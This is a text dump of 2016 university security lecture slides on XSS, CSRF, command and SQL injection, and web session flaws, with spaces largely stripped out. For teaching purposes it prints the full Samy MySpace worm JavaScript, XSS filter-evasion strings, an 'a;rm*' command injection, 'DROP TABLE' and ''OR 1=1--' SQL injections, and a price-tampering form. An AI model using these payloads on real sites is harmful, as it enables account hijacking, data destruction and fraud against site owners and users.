cse 484 / cse m 584: computer security and privacy xss attacks · owasp top 10 web vulnerabilities...
TRANSCRIPT
CSE484/CSEM584:ComputerSecurityandPrivacy
XSSattacks
Fall2016
Ada(Adam)[email protected]
ThankstoFranziRoesner,DanBoneh,DieterGollmann,DanHalperin,YoshiKohno,JohnManferdelli,JohnMitchell,VitalyShmatikov,BennetYee,andmanyothersforsampleslidesandmaterials...
OWASPTop10WebVulnerabilities
1. Injection2. BrokenAuthentication&SessionManagement3. Cross-SiteScripting4. InsecureDirectObjectReferences5. SecurityMisconfiguration6. SensitiveDataExposure7. MissingFunctionLevelAccessControl8. Cross-SiteRequestForgery9. UsingKnownVulnerableComponents10. UnvalidatedRedirectsandForwards
11/14/16 CSE484/CSEM584-Fall2016 2
http://www.owasp.org
CSRF
• “ConfusedDeputy”–thebrowseractswithAlice’sprivileges(cookies)evenwhendirectedtomakerequestsbyanattacker
• Defenses:– Formsynchronizationtokens– Refererheaderchecking
11/14/16 CSE484/CSEM584-Fall2016 3
Cross-SiteScripting(XSS)
11/14/16 CSE484/CSEM584-Fall2016 4
XSS
• Ihaveafriendwithareallyhardtopronouncename.
11/14/16 CSE484/CSEM584-Fall2016 5
Hernameis“<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>”!
PHP:HypertextProcessor
PHP: prints out: <?php echo $name; ?>>
11/14/16 CSE484/CSEM584-Fall2016 6
XSS
• “Reflected”XSS–vulnerableserviceechoesuserinputdirectlyfrominput(e.g.,fromquerystringinURL)– example.com?name=<imgsrc=…
• “Stored”XSS–vulnerableserviceechoesuserinputstoredindatabse– E.g.,Makeasocialmediapostthatincludesa<script>tag,andwhenotherpeoplereadyourpost…
11/14/16 CSE484/CSEM584-Fall2016 7
Defenses:Cross-SiteScripting(XSS)
• Anyuserinputandclient-sidedatamustbepreprocessedbeforeitisusedinsideHTML
• Remove/encodeHTMLspecialcharacters– Useagoodescapinglibrary
• OWASPESAPI(EnterpriseSecurityAPI)• Microsoft’sAntiXSS
– InPHP,htmlspecialchars(string)willreplaceallspecialcharacterswiththeirHTMLcodes• ‘becomes'“becomes"&becomes&
– InASP.NET,Server.HtmlEncode(string)
11/14/16 CSE484/CSEM584-Fall2016 8
Withappropriatedefenses
11/14/16 CSE484/CSEM584-Fall2016 9
naive.com/hello.cgi?name=Bob!
Welcome,dearBob
naive.com/hello.cgi?name=<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>!
Welcome,dear<img src=‘!
http://upload.wikimedia.org/!wikipedia/en/thumb/!3/39/YoshiMarioParty9 !.png/210px-YoshiMario !Party9.png’>!
Withfiltersinplace
• <html>Welcome, dear Bob</html>
• <imgsrc=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>
11/14/16 CSE484/CSEM584-Fall2016 10
EvadingXSSFilters
• PreventinginjectionofscriptsintoHTMLishard!– Blocking“<”and“>”isnotenough– Eventhandlers,stylesheets,encodedinputs(%3C),etc.
– phpBBallowedsimpleHTMLtagslike<b>
<bc=“>” onmouseover=“script”x=“<b”>Hello<b>
11/14/16 CSE484/CSEM584-Fall2016 11
EvadingXSSFilters
• Filterevasiontricks(XSSCheatSheet)– Iffilterallowsquoting(of<script>,etc.),bewareofmalformedquoting:<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
– LongUTF-8encoding– Scriptsarenotonlyin<script>:<iframesrc=‘https://bank.com/login’onload=‘steal()’>
11/14/16 CSE484/CSEM584-Fall2016 12
MySpaceWorm(1)
• UserscanpostHTMLontheirMySpacepages• MySpacedoesnotallowscriptsinusers’HTML– No<script>,<body>,onclick,<ahref=javascript://>
• …butdoesallow<div>tagsforCSS.– <divstyle=“background:url(‘javascript:alert(1)’)”>
• ButMySpacewillstripout“javascript”– Use“java<NEWLINE>script”instead
• ButMySpacewillstripoutquotes– Convertfromdecimalinstead:alert('doublequote:'+String.fromCharCode(34))
11/14/16 CSE484/CSEM584-Fall2016 13
http://namb.la/popular/tech.html
MySpaceWorm(2)Resultingcode:
<div id=mycode style="BACKGROUND: url('java �script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
http://namb.la/popular/tech.html
11/14/16 CSE484/CSEM584-Fall2016 14
MySpaceWorm(3)• “Therewereafewothercomplicationsandthingstogetaround.Thiswasnotbyanymeansastraightforwardprocess,andnoneofthiswasmeanttocauseanydamageorpissanyoneoff.Thiswasintheinterestof..interest.Itwasinterestingandfun!”
• Startedon“samy”MySpacepage• Everybodywhovisitsaninfectedpage,becomes
infectedandadds“samy”asafriendandhero• 5hourslater“samy”has1,005,831friends
– Wasadding1,000friendspersecondatitspeak
11/14/16 CSE484/CSEM584-Fall2016 15
http://namb.la/popular/tech.html
CommandInjectionandSQLInjection
11/14/16 CSE484/CSEM584-Spring2016 16
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)
11/14/16 CSE484/CSEM584-Spring2016 17
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)Whatifusername=“/etc/shadow”?
11/14/16 CSE484/CSEM584-Spring2016 18
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)Attackerusesname“a;rm*”http://victim.com/copy.php?name=“a;rm*”
11/14/16 CSE484/CSEM584-Spring2016 19
copy.phpexecutessystem(“cptemp.data;rm*.dat”);
SQL
• Widelyuseddatabasequerylanguage• Fetchasetofrecords
SELECT*FROMPersonWHEREUsername=‘lerner’
• AdddatatothetableINSERTINTOKey(Username,Key)VALUES(‘lerner’,3611BBFF)
• ModifydataUPDATEKeysSETKey=FA33452DWHEREPersonID=5
• Querysyntax(mostly)independentofvendor
11/14/16 CSE484/CSEM584-Spring2016 20
NaïveQueryGenerationCode
$selecteduser=$_GET['user'];$sql="SELECTUsername,KeyFROMKey"."WHEREUsername='$selecteduser'";$rs=$db->executeQuery($sql);
Whatif‘user’isamaliciousstringthatchangesthemeaningofthequery?
11/14/16 CSE484/CSEM584-Spring2016 21
TypicalLoginPrompt
11/14/16 CSE484/CSEM584-Spring2016 22
UserInputBecomesPartofQuery
11/14/16 CSE484/CSEM584-Spring2016 23
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘$user’
NormalLogin
11/14/16 CSE484/CSEM584-Spring2016 24
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘franzi’
MaliciousUserInput
11/14/16 CSE484/CSEM584-Spring2016 25
SQLInjectionAttack
11/14/16 CSE484/CSEM584-Spring2016 26
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘’;DROPTABLEUSERS;--’
Eliminatesalluseraccounts
ExploitsofaMom
11/14/16 CSE484/CSEM584-Spring2016 27
http://xkcd.com/327/
SQLInjection:BasicIdea
11/14/16 CSE484/CSEM584-Spring2016 28
Victimserver
VictimSQLDB
Attacker postmaliciousform
unintendedquery
receivedatafromDB
1
2
3
• Thisisaninputvalidationvulnerability• UnsanitizeduserinputinSQLquerytoback-end
databasechangesthemeaningofquery• Specialcaseofcommandinjection
AuthenticationwithBackendDBsetUserFound=execute(“SELECT*FROMUserTableWHEREusername=‘ ”&form(“user”)&“′ANDpassword=‘ ”&form(“pwd”)&“′”);
Usersuppliesusernameandpassword,thisSQLquerychecksifuser/passwordcombinationisinthedatabase
IfnotUserFound.EOFAuthenticationcorrectelseFail
11/14/16 CSE484/CSEM584-Spring2016 29
OnlytrueiftheresultofSQLqueryisnotempty,i.e.,user/pwdisinthedatabase
UsingSQLInjectiontoLogIn
• Usergivesusername’OR1=1--• WebserverexecutesquerysetUserFound=execute(SELECT*FROMUserTableWHEREusername=‘’OR1=1--…);
• Nowallrecordsmatchthequery,sotheresultisnotempty⇒correct“authentication”!
11/14/16 CSE484/CSEM584-Spring2016 30
Alwaystrue! Everythingafter--isignored!
PreventingSQLInjection
• Validateallinputs– Filteroutanycharacterthathasspecialmeaning
• Apostrophes,semicolons,percent,hyphens,underscores,…• Useescapecharacterstopreventspecialcharactersformbecomingpartofthequerycode– E.g.:escape(O’Connor)=O\’Connor
– Checkthedatatype(e.g.,inputmustbeaninteger)
11/14/16 CSE484/CSEM584-Spring2016 31
PreparedStatementsPreparedStatementps=db.prepareStatement("SELECTpizza,toppings,quantity,order_day"+"FROMordersWHEREuserid=?ANDorder_month=?");ps.setInt(1,session.getCurrentUserId());ps.setInt(2,Integer.parseInt(request.getParamenter("month")));ResultSetres=ps.executeQuery();• Bindvariables:placeholdersguaranteedtobedata(notcode)• Queryisparsedwithoutdataparameters• Bindvariablesaretyped(int,string,…)
11/14/16 CSE484/CSEM584-Spring2016 32
Bindvariable(dataplaceholder)
http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
TopWebVulnerabilities:Summary
• XSRF(CSRF)–cross-siterequestforgery– Badwebsiteforcestheuser’sbrowsertosendarequesttoagoodwebsite
• XSS(CSS)–cross-sitescripting– Maliciouscodeinjectedintoatrustedcontext(e.g.,maliciousdatapresentedbyanhonestwebsiteinterpretedascodebytheuser’sbrowser)
• SQLinjection– Maliciousdatasenttoawebsiteisinterpretedascodeinaquerytothewebsite’sback-enddatabase
11/14/16 CSE484/CSEM584-Spring2016 33
WebSessionManagement
11/14/16 CSE484/CSEM584-Spring2016 34
PrimitiveBrowserSession
11/14/16 CSE484/CSEM584-Spring2016 35
www.e_buy.com
www.e_buy.com/shopping.cfm?
pID=269
Viewcatalog
www.e_buy.com/shopping.cfm?
pID=269&item1=102030405
www.e_buy.com/checkout.cfm?pID=269&
item1=102030405
CheckoutSelectitem
StoresessioninformationinURL;easilyreadonnetwork
BadIdea:EncodingStateinURL
• Unstable,frequentlychangingURLs• Vulnerabletoeavesdroppingandmodification• ThereisnoguaranteethatURLisprivate
11/14/16 CSE484/CSEM584-Spring2016 36
FatBrain.comcirca1999
• Userlogsintowebsitewithhispassword,authenticatorisgenerated,userisgivenspecialURLcontainingtheauthenticator
– WithspecialURL,userdoesn’tneedtore-authenticate
• Reasoning:usercouldnothavenotknownthespecialURLwithoutauthenticatingfirst.That’strue,BUT…
• Authenticatorsareglobalsequencenumbers– It’seasytoguesssequencenumberforanotheruser
– Partialfix:userandomauthenticators
11/14/16 CSE484/CSEM584-Spring2016 37
https://www.fatbrain.com/HelpAccount.asp?t=0&[email protected]&p2=540555758
https://www.fatbrain.com/HelpAccount.asp?t=0&p1=SomeoneElse&p2=540555752
TypicalSolution:WebAuthenticationviaCookies
• Serverscanusecookiestostorestateonclient– Whensessionstarts,servercomputesanauthenticator
andgivesitbacktobrowserintheformofacookie• Authenticatorsmustbeunforgeableandtamper-proof
– Maliciousclientshouldn’tbeabletocomputehisownormodifyanexistingauthenticator
• Example:MAC(server’ssecretkey,sessionid)– Witheachrequest,browserpresentsthecookie– Serverrecomputesandverifiestheauthenticator
• Serverdoesnotneedtoremembertheauthenticator
11/14/16 CSE484/CSEM584-Spring2016 38
StoringStateinHiddenForms
11/14/16 CSE484/CSEM584-Spring2016 39
• DansieShoppingCart(2006)– “Apremium,comprehensive,Perlshoppingcart.Increaseyourweb
salesbymakingiteasierforyourwebstorecustomerstoorder.”
<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
Black Leather purse with leather straps<BR>Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse
with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
Changethisto2.00
Bargainshopping!
Fix:MACclient-sidedata,or,morelikely,keeponserver.